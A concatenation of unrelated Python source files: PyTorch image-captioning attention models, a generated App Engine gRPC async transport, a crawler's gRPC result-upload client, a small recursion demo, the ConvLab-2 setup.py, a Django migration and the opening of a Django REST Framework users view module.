logprobs = F.log_softmax(self.logit(output))
return logprobs, state
def sample_beam(self, fc_feats, att_feats, opt={}):
beam_size = opt.get('beam_size', 10)
batch_size = fc_feats.size(0)
# embed fc and att feats
fc_feats = self.fc_embed(fc_feats)
_att_feats = self.att_embed(att_feats.view(-1, self.att_feat_size))
att_feats = _att_feats.view(*(att_feats.size()[:-1] + (self.rnn_size,)))
# Project the attention feats first to reduce memory and computation comsumptions.
p_att_feats = self.ctx2att(att_feats.view(-1, self.rnn_size))
p_att_feats = p_att_feats.view(*(att_feats.size()[:-1] + (self.att_hid_size,)))
assert beam_size <= self.vocab_size + 1, 'lets assume this for now, otherwise this corner case causes a few headaches down the road. can be dealt with in future if needed'
seq = torch.LongTensor(self.seq_length, batch_size).zero_()
seqLogprobs = torch.FloatTensor(self.seq_length, batch_size)
# lets process every image independently for now, for simplicity
self.done_beams = [[] for _ in range(batch_size)]
for k in range(batch_size):
state = self.init_hidden(beam_size)
tmp_fc_feats = fc_feats[k:k+1].expand(beam_size, fc_feats.size(1))
tmp_att_feats = att_feats[k:k+1].expand(*((beam_size,)+att_feats.size()[1:])).contiguous()
tmp_p_att_feats = p_att_feats[k:k+1].expand(*((beam_size,)+p_att_feats.size()[1:])).contiguous()
for t in range(1):
if t == 0: # input <bos>
it = fc_feats.data.new(beam_size).long().zero_()
xt = self.embed(Variable(it, requires_grad=False))
output, state = self.core(xt, tmp_fc_feats, tmp_att_feats, tmp_p_att_feats, state)
logprobs = F.log_softmax(self.logit(output))
self.done_beams[k] = self.beam_search(state, logprobs, tmp_fc_feats, tmp_att_feats, tmp_p_att_feats, opt=opt)
seq[:, k] = self.done_beams[k][0]['seq'] # the first beam has highest cumulative score
seqLogprobs[:, k] = self.done_beams[k][0]['logps']
# return the samples and their log likelihoods
return seq.transpose(0, 1), seqLogprobs.transpose(0, 1)
def sample(self, fc_feats, att_feats, opt={}):
sample_max = opt.get('sample_max', 1)
beam_size = opt.get('beam_size', 1)
temperature = opt.get('temperature', 1.0)
if beam_size > 1:
return self.sample_beam(fc_feats, att_feats, opt)
batch_size = fc_feats.size(0)
state = self.init_hidden(batch_size)
# embed fc and att feats
fc_feats = self.fc_embed(fc_feats)
_att_feats = self.att_embed(att_feats.view(-1, self.att_feat_size))
att_feats = _att_feats.view(*(att_feats.size()[:-1] + (self.rnn_size,)))
# Project the attention feats first to reduce memory and computation comsumptions.
p_att_feats = self.ctx2att(att_feats.view(-1, self.rnn_size))
p_att_feats = p_att_feats.view(*(att_feats.size()[:-1] + (self.att_hid_size,)))
seq = []
seqLogprobs = []
for t in range(self.seq_length + 1):
if t == 0: # input <bos>
it = fc_feats.data.new(batch_size).long().zero_()
elif sample_max:
sampleLogprobs, it = torch.max(logprobs.data, 1)
it = it.view(-1).long()
else:
if temperature == 1.0:
prob_prev = torch.exp(logprobs.data).cpu() # fetch prev distribution: shape Nx(M+1)
else:
# scale logprobs by temperature
prob_prev = torch.exp(torch.div(logprobs.data, temperature)).cpu()
it = torch.multinomial(prob_prev, 1)
sampleLogprobs = logprobs.gather(1, Variable(it, requires_grad=False)) # gather the logprobs at sampled positions
it = it.view(-1).long() # and flatten indices for downstream processing
xt = self.embed(Variable(it, requires_grad=False))
if t >= 1:
# stop when all finished
if t == 1:
unfinished = it > 0
else:
unfinished = unfinished * (it > 0)
if unfinished.sum() == 0:
break
it = it * unfinished.type_as(it)
seq.append(it) #seq[t] the input of t+2 time step
seqLogprobs.append(sampleLogprobs.view(-1))
output, state = self.core(xt, fc_feats, att_feats, p_att_feats, state)
logprobs = F.log_softmax(self.logit(output))
return torch.cat([_.unsqueeze(1) for _ in seq], 1), torch.cat([_.unsqueeze(1) for _ in seqLogprobs], 1)
class AdaAtt_lstm(nn.Module):
def __init__(self, opt, use_maxout=True):
super(AdaAtt_lstm, self).__init__()
self.input_encoding_size = opt.input_encoding_size
#self.rnn_type = opt.rnn_type
self.rnn_size = opt.rnn_size
self.num_layers = opt.num_layers
self.drop_prob_lm = opt.drop_prob_lm
self.fc_feat_size = opt.fc_feat_size
self.att_feat_size = opt.att_feat_size
self.att_hid_size = opt.att_hid_size
self.use_maxout = use_maxout
# Build a LSTM
self.w2h = nn.Linear(self.input_encoding_size, (4+(use_maxout==True)) * self.rnn_size)
self.v2h = nn.Linear(self.rnn_size, (4+(use_maxout==True)) * self.rnn_size)
self.i2h = nn.ModuleList([nn.Linear(self.rnn_size, (4+(use_maxout==True)) * self.rnn_size) for _ in range(self.num_layers - 1)])
self.h2h = nn.ModuleList([nn.Linear(self.rnn_size, (4+(use_maxout==True)) * self.rnn_size) for _ in range(self.num_layers)])
# Layers for getting the fake region
if self.num_layers == 1:
self.r_w2h = nn.Linear(self.input_encoding_size, self.rnn_size)
self.r_v2h = nn.Linear(self.rnn_size, self.rnn_size)
else:
self.r_i2h = nn.Linear(self.rnn_size, self.rnn_size)
self.r_h2h = nn.Linear(self.rnn_size, self.rnn_size)
def forward(self, xt, img_fc, state):
hs = []
cs = []
for L in range(self.num_layers):
# c,h from previous timesteps
prev_h = state[0][L]
prev_c = state[1][L]
# the input to this layer
if L == 0:
x = xt
i2h = self.w2h(x) + self.v2h(img_fc)
else:
x = hs[-1]
x = F.dropout(x, self.drop_prob_lm, self.training)
i2h = self.i2h[L-1](x)
all_input_sums = i2h+self.h2h[L](prev_h)
sigmoid_chunk = all_input_sums.narrow(1, 0, 3 * self.rnn_size)
sigmoid_chunk = F.sigmoid(sigmoid_chunk)
# decode the gates
in_gate = sigmoid_chunk.narrow(1, 0, self.rnn_size)
forget_gate = sigmoid_chunk.narrow(1, self.rnn_size, self.rnn_size)
out_gate = sigmoid_chunk.narrow(1, self.rnn_size * 2, self.rnn_size)
# decode the write inputs
if not self.use_maxout:
in_transform = F.tanh(all_input_sums.narrow(1, 3 * self.rnn_size, self.rnn_size))
else:
in_transform = all_input_sums.narrow(1, 3 * self.rnn_size, 2 * self.rnn_size)
in_transform = torch.max(\
in_transform.narrow(1, 0, self.rnn_size),
in_transform.narrow(1, self.rnn_size, self.rnn_size))
# perform the LSTM update
next_c = forget_gate * prev_c + in_gate * in_transform
# gated cells form the output
tanh_nex_c = F.tanh(next_c)
next_h = out_gate * tanh_nex_c
if L == self.num_layers-1:
if L == 0:
i2h = self.r_w2h(x) + self.r_v2h(img_fc)
else:
i2h = self.r_i2h(x)
n5 = i2h+self.r_h2h(prev_h)
fake_region = F.sigmoid(n5) * tanh_nex_c
cs.append(next_c)
hs.append(next_h)
# set up the decoder
top_h = hs[-1]
top_h = F.dropout(top_h, self.drop_prob_lm, self.training)
fake_region = F.dropout(fake_region, self.drop_prob_lm, self.training)
state = (torch.cat([_.unsqueeze(0) for _ in hs], 0),
torch.cat([_.unsqueeze(0) for _ in cs], 0))
return top_h, fake_region, state
class AdaAtt_attention(nn.Module):
def __init__(self, opt):
super(AdaAtt_attention, self).__init__()
self.input_encoding_size = opt.input_encoding_size
#self.rnn_type = opt.rnn_type
self.rnn_size = opt.rnn_size
self.drop_prob_lm = opt.drop_prob_lm
self.att_hid_size = opt.att_hid_size
# fake region embed
self.fr_linear = nn.Sequential(
nn.Linear(self.rnn_size, self.input_encoding_size),
nn.ReLU(),
nn.Dropout(self.drop_prob_lm))
self.fr_embed = nn.Linear(self.input_encoding_size, self.att_hid_size)
# h out embed
self.ho_linear = nn.Sequential(
nn.Linear(self.rnn_size, self.input_encoding_size),
nn.Tanh(),
nn.Dropout(self.drop_prob_lm))
self.ho_embed = nn.Linear(self.input_encoding_size, self.att_hid_size)
self.alpha_net = nn.Linear(self.att_hid_size, 1)
self.att2h = nn.Linear(self.rnn_size, self.rnn_size)
def forward(self, h_out, fake_region, conv_feat, conv_feat_embed):
# View into three dimensions
att_size = conv_feat.numel() // conv_feat.size(0) // self.rnn_size
conv_feat = conv_feat.view(-1, att_size, self.rnn_size)
conv_feat_embed = conv_feat_embed.view(-1, att_size, self.att_hid_size)
# view neighbor from bach_size * neighbor_num x rnn_size to bach_size x rnn_size * neighbor_num
fake_region = self.fr_linear(fake_region)
fake_region_embed = self.fr_embed(fake_region)
h_out_linear = self.ho_linear(h_out)
h_out_embed = self.ho_embed(h_out_linear)
txt_replicate = h_out_embed.unsqueeze(1).expand(h_out_embed.size(0), att_size + 1, h_out_embed.size(1))
img_all = torch.cat([fake_region.view(-1,1,self.input_encoding_size), conv_feat], 1)
img_all_embed = torch.cat([fake_region_embed.view(-1,1,self.input_encoding_size), conv_feat_embed], 1)
hA = F.tanh(img_all_embed + txt_replicate)
hA = F.dropout(hA,self.drop_prob_lm, self.training)
hAflat = self.alpha_net(hA.view(-1, self.att_hid_size))
PI = F.softmax(hAflat.view(-1, att_size + 1))
visAtt = torch.bmm(PI.unsqueeze(1), img_all)
visAttdim = visAtt.squeeze(1)
atten_out = visAttdim + h_out_linear
h = F.tanh(self.att2h(atten_out))
h = F.dropout(h, self.drop_prob_lm, self.training)
return h
class AdaAttCore(nn.Module):
def __init__(self, opt, use_maxout=False):
super(AdaAttCore, self).__init__()
self.lstm = AdaAtt_lstm(opt, use_maxout)
self.attention = AdaAtt_attention(opt)
def forward(self, xt, fc_feats, att_feats, p_att_feats, state):
h_out, p_out, state = self.lstm(xt, fc_feats, state)
atten_out = self.attention(h_out, p_out, att_feats, p_att_feats)
return atten_out, state
class TopDownCore(nn.Module):
def __init__(self, opt, use_maxout=False):
super(TopDownCore, self).__init__()
self.drop_prob_lm = opt.drop_prob_lm
self.att_lstm = nn.LSTMCell(opt.input_encoding_size + opt.rnn_size * 2, opt.rnn_size) # we, fc, h^2_t-1
self.lang_lstm = nn.LSTMCell(opt.rnn_size * 2, opt.rnn_size) # h^1_t, \hat v
self.attention = Attention(opt)
def forward(self, xt, fc_feats, att_feats, p_att_feats, state):
prev_h = state[0][-1]
att_lstm_input = torch.cat([prev_h, fc_feats, xt], 1)
h_att, c_att = self.att_lstm(att_lstm_input, (state[0][0], state[1][0]))
att = self.attention(h_att, att_feats, p_att_feats)
lang_lstm_input = torch.cat([att, h_att], 1)
# lang_lstm_input = torch.cat([att, F.dropout(h_att, self.drop_prob_lm, self.training)], 1) ?????
h_lang, c_lang = self.lang_lstm(lang_lstm_input, (state[0][1], state[1][1]))
output = F.dropout(h_lang, self.drop_prob_lm, self.training)
state = (torch.stack([h_att, h_lang]), torch.stack([c_att, c_lang]))
return output, state
class Attention(nn.Module):
def __init__(self, opt):
super(Attention, self).__init__()
self.rnn_size = opt.rnn_size
self.att_hid_size = opt.att_hid_size
self.h2att = nn.Linear(self.rnn_size, self.att_hid_size)
self.alpha_net = nn.Linear(self.att_hid_size, 1)
def forward(self, h, att_feats, p_att_feats):
# The p_att_feats here is already projected
att_size = att_feats.numel() // att_feats.size(0) // self.rnn_size
att = p_att_feats.view(-1, att_size, self.att_hid_size)
att_h = self.h2att(h) # batch * att_hid_size
att_h = att_h.unsqueeze(1).expand_as(att) # batch * att_size * att_hid_size
dot = att + att_h # batch * att_size * att_hid_size
dot = F.tanh(dot) # batch * att_size * att_hid_size
dot = dot.view(-1, self.att_hid_size) # (batch * att_size) * att_hid_size
dot = self.alpha_net(dot) # (batch * att_size) * 1
dot = dot.view(-1, att_size) # batch * att_size
weight = F.softmax(dot) # batch * att_size
att_feats_ = att_feats.view(-1, att_size, self.rnn_size) # batch * att_size * att_feat_size
att_res = torch.bmm(weight.unsqueeze(1), att_feats_).squeeze(1) # batch * att_feat_size
return att_res
class Att2in2Core(nn.Module):
def __init__(self, opt):
super(Att2in2Core, self).__init__()
self.input_encoding_size = opt.input_encoding_size
#self.rnn_type = opt.rnn_type
self.rnn_size = opt.rnn_size
#self.num_layers = opt.num_layers
self.drop_prob_lm = opt.drop_prob_lm
self.fc_feat_size = opt.fc_feat_size
self.att_feat_size = opt.att_feat_size
self.att_hid_size = opt.att_hid_size
# Build a LSTM
self.a2c = nn.Linear(self.rnn_size, 2 * self.rnn_size)
self.i2h = nn.Linear(self.input_encoding_size, 5 * self.rnn_size)
self.h2h = nn.Linear(self.rnn_size, 5 * self.rnn_size)
self.dropout = nn.Dropout(self.drop_prob_lm)
self.attention = Attention(opt)
def forward(self, xt, fc_feats, att_feats, p_att_feats, state):
att_res = self.attention(state[0][-1], att_feats, p_att_feats)
all_input_sums = self.i2h(xt) + self.h2h(state[0][-1])
sigmoid_chunk = all_input_sums.narrow(1, 0, 3 * self.rnn_size)
sigmoid_chunk = F.sigmoid(sigmoid_chunk)
in_gate = sigmoid_chunk.narrow(1, 0, self.rnn_size)
forget_gate = sigmoid_chunk.narrow(1, self.rnn_size, self.rnn_size)
out_gate = sigmoid_chunk.narrow(1, self.rnn_size * 2, self.rnn_size)
in_transform = all_input_sums.narrow(1, 3 * self.rnn_size, 2 * self.rnn_size) + \
self.a2c(att_res)
in_transform = torch.max(\
in_transform.narrow(1, 0, self.rnn_size),
in_transform.narrow(1, self.rnn_size, self.rnn_size))
next_c = forget_gate * state[1][-1] + in_gate * in_transform
next_h = out_gate * F.tanh(next_c)
output = self.dropout(next_h)
state = (next_h.unsqueeze(0), next_c.unsqueeze(0))
return output, state
class AdaAttModel(AttModel):
def __init__(self, opt):
super(AdaAttModel, self).__init__(opt)
self.core = AdaAttCore(opt)
# AdaAtt with maxout lstm
class AdaAttMOModel(AttModel):
def __init__(self, opt):
super(AdaAttMOModel, self).__init__(opt)
self.core = AdaAttCore(opt, True)
class Att2in2Model(AttModel):
def __init__(self, opt):
super(Att2in2Model, self).__init__(opt)
self.core = Att2in2Core(opt)
delattr(self, 'fc_embed')
self.fc_embed = lambda x : x
class TopDownModel(AttModel):
def __init__(self, opt):
super(TopDownModel, self).__init__(opt)
self.num_layers = 2
self.core = TopDownCore(opt)
|
py | 1a3472d56c71b8ff1cd77ae369d52684b7223731 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Awaitable, Callable, Dict, Optional, Sequence, Tuple, Union
from google.api_core import gapic_v1 # type: ignore
from google.api_core import grpc_helpers_async # type: ignore
from google.api_core import operations_v1 # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import packaging.version
import grpc # type: ignore
from grpc.experimental import aio # type: ignore
from google.cloud.appengine_admin_v1.types import appengine
from google.cloud.appengine_admin_v1.types import service
from google.longrunning import operations_pb2 # type: ignore
from .base import ServicesTransport, DEFAULT_CLIENT_INFO
from .grpc import ServicesGrpcTransport
class ServicesGrpcAsyncIOTransport(ServicesTransport):
"""gRPC AsyncIO backend transport for Services.
Manages services of an application.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
_grpc_channel: aio.Channel
_stubs: Dict[str, Callable] = {}
@classmethod
def create_channel(cls,
host: str = 'appengine.googleapis.com',
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
**kwargs) -> aio.Channel:
"""Create and return a gRPC AsyncIO channel object.
Args:
host (Optional[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
aio.Channel: A gRPC AsyncIO channel object.
"""
return grpc_helpers_async.create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
quota_project_id=quota_project_id,
default_scopes=cls.AUTH_SCOPES,
scopes=scopes,
default_host=cls.DEFAULT_HOST,
**kwargs
)
def __init__(self, *,
host: str = 'appengine.googleapis.com',
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
channel: aio.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
client_cert_source_for_mtls: Callable[[], Tuple[bytes, bytes]] = None,
quota_project_id=None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
channel (Optional[aio.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
``client_cert_source`` or application default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for the grpc channel. It is ignored if ``channel`` is provided.
client_cert_source_for_mtls (Optional[Callable[[], Tuple[bytes, bytes]]]):
A callback to provide client certificate bytes and private key bytes,
both in PEM format. It is used to configure a mutual TLS channel. It is
ignored if ``channel`` or ``ssl_channel_credentials`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
Raises:
google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport
creation failed for any reason.
google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
and ``credentials_file`` are passed.
"""
self._grpc_channel = None
self._ssl_channel_credentials = ssl_channel_credentials
self._stubs: Dict[str, Callable] = {}
self._operations_client = None
if api_mtls_endpoint:
warnings.warn("api_mtls_endpoint is deprecated", DeprecationWarning)
if client_cert_source:
warnings.warn("client_cert_source is deprecated", DeprecationWarning)
if channel:
# Ignore credentials if a channel was passed.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
else:
if api_mtls_endpoint:
host = api_mtls_endpoint
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
self._ssl_channel_credentials = SslCredentials().ssl_credentials
else:
if client_cert_source_for_mtls and not ssl_channel_credentials:
cert, key = client_cert_source_for_mtls()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
# The base transport sets the host, credentials and scopes
super().__init__(
host=host,
credentials=credentials,
credentials_file=credentials_file,
scopes=scopes,
quota_project_id=quota_project_id,
client_info=client_info,
always_use_jwt_access=always_use_jwt_access,
)
if not self._grpc_channel:
self._grpc_channel = type(self).create_channel(
self._host,
credentials=self._credentials,
credentials_file=credentials_file,
scopes=self._scopes,
ssl_credentials=self._ssl_channel_credentials,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Wrap messages. This must be done after self._grpc_channel exists
self._prep_wrapped_messages(client_info)
@property
def grpc_channel(self) -> aio.Channel:
"""Create the channel designed to connect to this service.
This property caches on the instance; repeated calls return
the same channel.
"""
# Return the channel from cache.
return self._grpc_channel
@property
def operations_client(self) -> operations_v1.OperationsAsyncClient:
"""Create the client designed to process long-running operations.
This property caches on the instance; repeated calls return the same
client.
"""
# Sanity check: Only create a new client if we do not already have one.
if self._operations_client is None:
self._operations_client = operations_v1.OperationsAsyncClient(
self.grpc_channel
)
# Return the client from cache.
return self._operations_client
@property
def list_services(self) -> Callable[
[appengine.ListServicesRequest],
Awaitable[appengine.ListServicesResponse]]:
r"""Return a callable for the list services method over gRPC.
Lists all the services in the application.
Returns:
Callable[[~.ListServicesRequest],
Awaitable[~.ListServicesResponse]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'list_services' not in self._stubs:
self._stubs['list_services'] = self.grpc_channel.unary_unary(
'/google.appengine.v1.Services/ListServices',
request_serializer=appengine.ListServicesRequest.serialize,
response_deserializer=appengine.ListServicesResponse.deserialize,
)
return self._stubs['list_services']
@property
def get_service(self) -> Callable[
[appengine.GetServiceRequest],
Awaitable[service.Service]]:
r"""Return a callable for the get service method over gRPC.
Gets the current configuration of the specified
service.
Returns:
Callable[[~.GetServiceRequest],
Awaitable[~.Service]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'get_service' not in self._stubs:
self._stubs['get_service'] = self.grpc_channel.unary_unary(
'/google.appengine.v1.Services/GetService',
request_serializer=appengine.GetServiceRequest.serialize,
response_deserializer=service.Service.deserialize,
)
return self._stubs['get_service']
@property
def update_service(self) -> Callable[
[appengine.UpdateServiceRequest],
Awaitable[operations_pb2.Operation]]:
r"""Return a callable for the update service method over gRPC.
Updates the configuration of the specified service.
Returns:
Callable[[~.UpdateServiceRequest],
Awaitable[~.Operation]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'update_service' not in self._stubs:
self._stubs['update_service'] = self.grpc_channel.unary_unary(
'/google.appengine.v1.Services/UpdateService',
request_serializer=appengine.UpdateServiceRequest.serialize,
response_deserializer=operations_pb2.Operation.FromString,
)
return self._stubs['update_service']
@property
def delete_service(self) -> Callable[
[appengine.DeleteServiceRequest],
Awaitable[operations_pb2.Operation]]:
r"""Return a callable for the delete service method over gRPC.
Deletes the specified service and all enclosed
versions.
Returns:
Callable[[~.DeleteServiceRequest],
Awaitable[~.Operation]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'delete_service' not in self._stubs:
self._stubs['delete_service'] = self.grpc_channel.unary_unary(
'/google.appengine.v1.Services/DeleteService',
request_serializer=appengine.DeleteServiceRequest.serialize,
response_deserializer=operations_pb2.Operation.FromString,
)
return self._stubs['delete_service']
def close(self):
return self.grpc_channel.close()
__all__ = (
'ServicesGrpcAsyncIOTransport',
)
|
py | 1a3472e0f2c813eeca1df06b619cdcd4ffdca488 | # -*- coding: utf-8 -*-
import json
import os
import grpc
from rpc.pb import result_pb2
from rpc.pb.result_pb2_grpc import ResultStub
CHUNK_SIZE = 10 * 1024
def get_file_chunks(filename, folder_path):
yield result_pb2.StreamUploadPictureRequest(filename=filename)
with open(f'/usr/src/app/{folder_path}/' + filename, 'rb') as f:
while True:
piece = f.read(CHUNK_SIZE)
if len(piece) == 0:
return
yield result_pb2.StreamUploadPictureRequest(file_data={"buffer": piece})
def remove_file(file_path):
"""
删除文件
:param file_path:
:return:
"""
try:
os.remove(file_path)
except (NotImplementedError, FileNotFoundError):
pass
class ResultClient(object):
def __init__(self, rpc_server):
# RPC服务器信道
channel = grpc.insecure_channel(target=f'{rpc_server}', options=[
('grpc.max_send_message_length', int(os.getenv('GRPC_MAX_SEND_MESSAGE_LENGTH', 200)) * 1024 * 1024),
('grpc.max_receive_message_length', int(os.getenv('GRPC_MAX_RECEIVE_MESSAGE_LENGTH', 200)) * 1024 * 1024),
])
# 获取Result grpc服务对象
self.stub = ResultStub(channel)
def save_base_result(self, subtask_id, url_id, url_address, finished_at, **kwargs):
"""保存爬虫基本信息"""
# 返回头部序列化
kwargs['response_headers'] = self.dic2json(kwargs.pop('response_headers', {}))
# 生成状态码
kwargs['http_code'] = kwargs['redirect_chain'][-1]['redirect_http_code'] if kwargs['redirect_chain'] else None
# 去除firefox和chrome默认content
if kwargs['content'] and (kwargs['content'].startswith(
'<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">')
or kwargs['content'] == '<html><head></head><body></body></html>'):
kwargs['content'] = None
# # http交互过程序列化
# kwargs['http_archive'] = self.dic2json(kwargs.pop('http_archive', []))
self.stub.SaveBaseResult(
result_pb2.SaveBaseResultRequest(
subtask_id=subtask_id, url_id=url_id, url_address=url_address,
finished_at=finished_at, **kwargs),
timeout=30
)
def upload_screenshot(self, screenshot_name):
"""上传截图"""
chunks_generator = get_file_chunks(screenshot_name, folder_path='screenshots')
response = self.stub.StreamUploadPicture(chunks_generator)
file_path = f'/usr/src/app/screenshots/{screenshot_name}'
assert response.length == os.path.getsize(file_path)
remove_file(file_path)
def set_subtask_status(self, subtask_id, status, finished_at):
"""标记子任务爬取状态"""
self.stub.SetSubTaskStatus(
result_pb2.SetSubTaskStatusRequest(
subtask_id=subtask_id,
status=status,
finished_at=finished_at
),
timeout=30
)
def upload_har_file(self, har_file_name):
"""上传har文件"""
chunks_generator = get_file_chunks(har_file_name, folder_path='hars')
response = self.stub.StreamUploadHarFile(chunks_generator)
file_path = f'/usr/src/app/hars/{har_file_name}'
assert response.length == os.path.getsize(file_path)
remove_file(file_path)
@staticmethod
def dic2json(dic):
"""某些字段转换为json"""
return json.dumps(dic, ensure_ascii=False)
|
py | 1a34767707c212c9e8067738af3c29910a60bf4d | tab = ''
def pow(x, n) :
global tab
tab += ' '
if n == 0 :
return 1
print(tab+"%d*%d^(%d-%d)" % (x, x, n, 1))
return x * pow (x, n-1)
print('2^4')
print('답 -->', pow(2, 4))
|
py | 1a3477af409f3889378f81a5f47196bf25901e32 | '''
setup.py for ConvLab-2
'''
import sys
import os
from setuptools import setup, find_packages
from setuptools.command.test import test as TestCommand
class LibTest(TestCommand):
def run_tests(self):
# import here, cause outside the eggs aren't loaded
ret = os.system("pytest --cov=ConvLab-2 tests/ --cov-report term-missing")
sys.exit(ret >> 8)
setup(
name='ConvLab-2',
version='0.0.1',
packages=find_packages(exclude=[]),
license='Apache',
description='Task-oriented Dialog System Toolkits',
long_description=open('README.md', encoding='UTF-8').read(),
long_description_content_type="text/markdown",
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering :: Artificial Intelligence',
],
install_requires=[
'nltk>=3.4',
'tqdm>=4.30',
'checksumdir>=1.1',
'visdom',
'Pillow',
'future',
'torch',
'numpy>=1.15.0',
'scipy',
'scikit-learn==0.20.3',
'pytorch-pretrained-bert>=0.6.1',
'transformers>=2.3.0',
'tensorflow==1.14',
'tensorboard>=1.14.0',
'tensorboardX==1.7',
'allennlp',
'requests',
'simplejson',
'unidecode',
'jieba'
],
extras_require={
'develop': [
"python-coveralls",
"pytest-dependency",
"pytest-mock",
"requests-mock",
"pytest>=3.6.0",
"pytest-cov==2.4.0",
"checksumdir",
"bs4",
"lxml",
]
},
cmdclass={'test': LibTest},
entry_points={
'console_scripts': [
"ConvLab-2-report=convlab2.scripts:report"
]
},
include_package_data=True,
url='https://github.com/thu-coai/ConvLab-2',
author='thu-coai',
author_email='[email protected]',
python_requires='>=3.5',
zip_safe=False
)
|
py | 1a3477c94a6a4248894fb12f9ff31ee1e7a18b67 | # Generated by Django 1.10.3 on 2016-11-23 10:06
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='DemoModel1',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
],
),
migrations.CreateModel(
name='DemoModel2',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
],
),
migrations.CreateModel(
name='DemoModel3',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
],
),
migrations.CreateModel(
name='DemoModel4',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
],
),
]
|
py | 1a3477dda27ad0c84c3b014c411242e115f4bfac |
from rest_framework import mixins, status, viewsets
from rest_framework import response
from rest_framework.response import Response
from rest_framework.decorators import action
from cride.users.models import Users
from cride.circles.models import Circle
from cride.circles.serializers import CircleModelSerializer
from cride.users.serializers.profile import ProfileModelSerializer
# * permisions
from rest_framework.permissions import (
AllowAny,
IsAuthenticated
)
from cride.users.permissions import IsAccountOwner
# * Serializer methods
from cride.users.serializers import (
UserLoginSerializer,
UserSignupSerializer,
